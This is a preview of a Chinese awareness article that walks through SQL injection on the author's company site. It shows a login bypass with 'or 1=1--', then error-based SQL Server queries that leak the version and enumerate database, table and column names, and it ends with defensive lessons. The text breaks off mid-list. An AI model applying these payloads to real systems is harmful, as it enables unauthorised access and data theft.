何小伟—实况转播SQL注入全过程.doc_第1页
何小伟—实况转播SQL注入全过程.doc_第2页
何小伟—实况转播SQL注入全过程.doc_第3页
何小伟—实况转播SQL注入全过程.doc_第4页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

何小伟-实况转播SQL注入全过程,让你知道危害有多大。前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是A的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多大的危害。初步注入-绕过验证,直接登录公司网站登陆框如下:可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下:SELECT * From Table WHERE Name=XX and Password=YY and Corp=ZZ我发现前两者都做一些检查,而第三个输入框却疏忽了,漏洞就在这里!注入开始,在输入框中输入以下内容:用户名乱填,密码留空,这种情况下点击登录按钮后竟然成功登录了。我们看一下最终的SQL就会找到原因:SELECT * From Table WHERE Name=SQL inject and Password= and Corp= or 1=1-从代码可以看出,前一半单引号被闭合,后一半单引号被 “-”给注释掉,中间多了一个永远成立的条件“1=1”,这就造成任何字符都能成功登录的结果。而Sql注入的危害却不仅仅是匿名登录。中级注入-借助异常获取信息。现在我们在第三个输入框中写入:“ or 1=(SELECT version) ”。如下:后台的SQL变成了这样:SELECT * From Table WHERE Name=SQL inject and Password= and Corp= or 1=(SELECT VERSION)-判断条件变成了 1=(SELECT VERSION),这个写法肯定会导致错误,但出错正是我们想要的。点击登录后,页面出现以下信息:Conversion failed when converting the nvarchar value Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) to data type int.可怕的事情出现了,服务器的操作系统和SQL Server版本信息竟然通过错误显示出来。危害扩大-获取服务器所有的库名、表名、字段名接着,我们在输入框中输入如下信息:“t or 1=(SELECT top 1 name FROM master.sysdatabases where name not in (SELECT top 0 name FROM master.sysdatabases)-”,此时发现第三个输入框有字数长度的限制,然而这种客户端的限制形同虚设,直接通过Google浏览器就能去除。点击登录,返回的信息如下:Conversion failed when converting the nvarchar value master to data type int.数据库名称“master”通过异常被显示出来!依次改变上面SQL语句中的序号,就能得到服务器上所有数据库的名称。接着,输入信息如下:“b or 1=(SELECT top 1 name FROM master.sysobjects where xtype=U and name not in (SELECT top 1 name FROM master.sysobjects where xtype=U)-”得到返回信息如下:Conversion failed when converting the nvarchar value spt_fallback_db to data type int.我们得到了master数据库中的第一张表名:“spt_fallback_db”,同上,依次改变序号,可得到该库全部表名。现在我们以“spt_fallback_db”表为例,尝试获取该表中所有的字段名。在输入框中输入以下代码:“b or 1=(SELECT top 1 FROM master.syscolumns, master.sysobjects WHERE master.syscolumns.id=master.sysobjects.id AND =spt_fallback_db);”于是,得到错误提示如下:Conversion failed when converting the nvarchar value xserver_name to data type int.;这样第一个字段名“xserver_name”就出来了,依次改变序号,就能遍历出所有的字段名。最终目的-获取数据库中的数据写到这里,我们已知通过SQL注入能获取全部的数据库,表,及其字段,为了防止本文完全沦为注入教程,获取数据的代码就不再描述,而这篇文章的目的也已达到,SQL注入意味着什么?意味着数据库中所有数据都能被盗取。当知道这个危害以后,是否还能有人对SQL注入漏洞置之不理?结语关于安全性,本文可总结出一下几点:1. 对用户输入的内容要时刻保持警惕。2. 只有客户端的验证等于没有验证。3. 永远不要把服务器错误信息暴露给用户。除此之外,我还要补充几点:1. SQL注入不仅能通过输入框,还能通过

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论